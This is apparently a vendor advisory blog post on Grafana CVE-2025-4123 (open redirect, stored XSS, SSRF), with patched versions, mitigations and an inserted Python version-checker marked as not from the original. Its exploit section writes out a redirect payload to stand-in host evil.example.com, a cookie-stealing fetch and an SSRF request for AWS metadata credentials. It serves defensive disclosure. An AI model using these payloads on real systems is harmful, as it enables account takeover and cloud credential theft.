Exploited! Grafana CVE-2025-4123 – Open Redirect & Stored XSS Give Attackers a Springboard Into Your Cloud

Amit Sheps, Director of Product Marketing
May 22, 2025

Grafana—the cloud-native observability dashboard almost every DevOps team relies on—rushed out Grafana 12.0.0-security-01 yesterday to squash CVE-2025-4123, a high-severity open-redirect and stored cross-site scripting (XSS) vulnerability. When chained with the popular Grafana Image Renderer plugin, the bug escalates to a full-read server-side request forgery (SSRF), exposing cloud-metadata services and internal APIs. Grafana Cloud SaaS tenants are not affected, but any self-hosted instance on an earlier release is in the blast zone.

Grafana often acts as the single pane of glass for SREs, surfacing real-time metrics from Prometheus, Loki, and Tempo, so a compromised dashboard is more than a UI problem: attackers gain a pivot point into every data-source credential Grafana stores, often including cloud keys, database passwords, and on-call notification tokens. That dramatically widens the blast radius.


What is CVE-2025-4123?

A bug-bounty report on April 26 2025 uncovered a flaw in Grafana’s URL-sanitisation logic for custom frontend-plugin downloads. By smuggling a double-encoded path-traversal sequence (..%2F) into the /redirect endpoint, an attacker forces Grafana to forward the victim’s browser to any external URL under their control. Hosting a specially crafted plugin manifest on that site lets the attacker inject arbitrary JavaScript that executes in the trusted grafana-origin context—classic stored XSS. When anonymous access is enabled (default in many lab and demo environments) the attack needs no credentials at all.


Impacted Versions (patched releases)

Upgrade to the first “security-01” build available for your branch:

  • 12.0.0-security-01
  • 11.6.1-security-01
  • 11.5.4-security-01
  • 11.4.4-security-01
  • 11.3.6-security-01
  • 11.2.9-security-01
  • 10.4.18-security-01

All earlier 12.x, 11.x, 10.x—and all unsupported Grafana 9/8 releases—remain vulnerable.
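Answering "is my build fixed?" from the table above is easy to get wrong by hand, because the fix is a suffixed build ("security-01") rather than a plain patch bump. The script below is an added example, not from the original post or from Grafana Labs: it encodes the advisory's table and classifies a version string such as the one printed by `grafana server -v` or returned in the "version" field of GET /api/health (the exact shape of that output is an assumption; only the X.Y.Z[-suffix] token is used). Treating every branch that is not in the table as vulnerable is this script's own conservative rule; it matches the post's statement about earlier 12.x/11.x/10.x and unsupported 9.x/8.x releases, and the table would need updating for branches released after the advisory.

```python
"""Check whether a self-hosted Grafana version carries the CVE-2025-4123 fix.

Added example (not from the original post). The table is the advisory's list
of first fixed builds; unlisted branches are assumed vulnerable.
"""
import re

# (major, minor) -> (first fixed patch level, required build suffix)
PATCHED_RELEASES = {
    (12, 0): (0, "security-01"),
    (11, 6): (1, "security-01"),
    (11, 5): (4, "security-01"),
    (11, 4): (4, "security-01"),
    (11, 3): (6, "security-01"),
    (11, 2): (9, "security-01"),
    (10, 4): (18, "security-01"),
}

# Matches "12.0.0", "12.0.0-security-01", "v11.6.1"; the suffix is optional.
VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?")


def extract_version(text: str) -> str:
    """Pull the first X.Y.Z[-suffix] token out of free text such as
    'Version 11.5.4-security-01 (commit: ..., branch: ...)' (format assumed)."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no Grafana version found in: {text!r}")
    major, minor, patch, suffix = m.groups()
    return f"{major}.{minor}.{patch}{suffix or ''}"


def parse_version(version: str):
    """Split a version string into (major, minor, patch, suffix-without-dash)."""
    m = VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised Grafana version: {version!r}")
    major, minor, patch, suffix = m.groups()
    return int(major), int(minor), int(patch), (suffix or "").lstrip("-")


def assess(version: str) -> str:
    """Return 'patched: ...' or 'vulnerable: ...' for the given version."""
    major, minor, patch, suffix = parse_version(version)
    fixed = PATCHED_RELEASES.get((major, minor))
    if fixed is None:
        # 9.x/8.x and other branches without a security-01 build (assumption:
        # treat anything not in the advisory's table as unfixed).
        return f"vulnerable: no fixed build published for the {major}.{minor}.x branch"
    fixed_patch, fixed_suffix = fixed
    if patch > fixed_patch:
        return "patched: later release on a fixed branch"
    if patch == fixed_patch and suffix.startswith("security-") and suffix >= fixed_suffix:
        return f"patched: {version} is the security build for this branch"
    return f"vulnerable: upgrade to {major}.{minor}.{fixed_patch}-{fixed_suffix}"


def is_patched(version: str) -> bool:
    return assess(version).startswith("patched")


if __name__ == "__main__":
    for v in ["12.0.0", "12.0.0-security-01", "11.6.1", "11.6.2", "10.4.17", "9.5.3"]:
        print(f"{v:22} {assess(v)}")
```

Note that a plain 12.0.0 is reported as vulnerable: only the suffixed security build, or a later patch release on the same branch, counts as fixed.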

Exploit Methods – From Redirect to XSS to SSRF

# 1. Evil plugin bundle (plugin.json + malware.js) is hosted at evil.example.com

# 2. Attacker crafts encoded redirect link:

https://grafana-vuln.local/redirect?url=https%3A%2F%2Fevil.example.com%2Fgplug.zip

# 3. Victim clicks link (phishing, iframe, Slack mention).

# 4. Grafana fetches ZIP, installs plugin, JS runs inside grafana.domain:

fetch('/api/login/ping', {method:'POST', body: document.cookie});

# 5. If grafana-image-renderer present:

POST /api/render?url=http://169.254.169.254/latest/meta-data/iam/security-credentials

# → returns AWS creds (full-read SSRF)

Why the chain works:

  • Path traversal + open redirect bypass Grafana’s allow-list.
  • Unsigned plugins load when allow_loading_unsigned_plugins = true.
  • Stored XSS fires in a privileged origin, stealing session tokens or creating admin users.
  • Image Renderer proxies arbitrary URLs, enabling SSRF.

Potential Risk

  • Session hijacking & account takeover—stolen cookies or JWTs grant full dashboard access.
  • Privilege escalation inside Grafana—attackers can add data-sources or tamper with alerting rules.
  • Read-anywhere SSRF—exposure of cloud IAM credentials and internal REST endpoints.
  • Telemetry exfiltration & fake metrics—poisoned panels mislead SREs during incidents.
  • Lateral movement—Grafana often runs with high-privilege Kubernetes ServiceAccount tokens.

Mitigation

  1. Patch immediately – docker pull grafana/grafana:12.0.0-security-01 (or the matching tag above).
  2. Disable anonymous access – in grafana.ini set [auth.anonymous] enabled = false.
  3. Enable a strict Content-Security-Policy until you can patch, in grafana.ini:

     [security]
     content_security_policy = true
     content_security_policy_template = "script-src 'self'; object-src 'none';"

  4. Remove or update the Image Renderer plugin if unused.
  5. Restrict outbound egress so Grafana can fetch only approved domains.
  6. Hunt for IOCs – look for /redirect?url= requests and unexpected plugin ZIP downloads in reverse-proxy logs.

Am I Impacted by CVE-2025-4123?

IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit-simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.

IONIX customers will see updated risk posture automatically populated in dashboards over the next scan cycle.
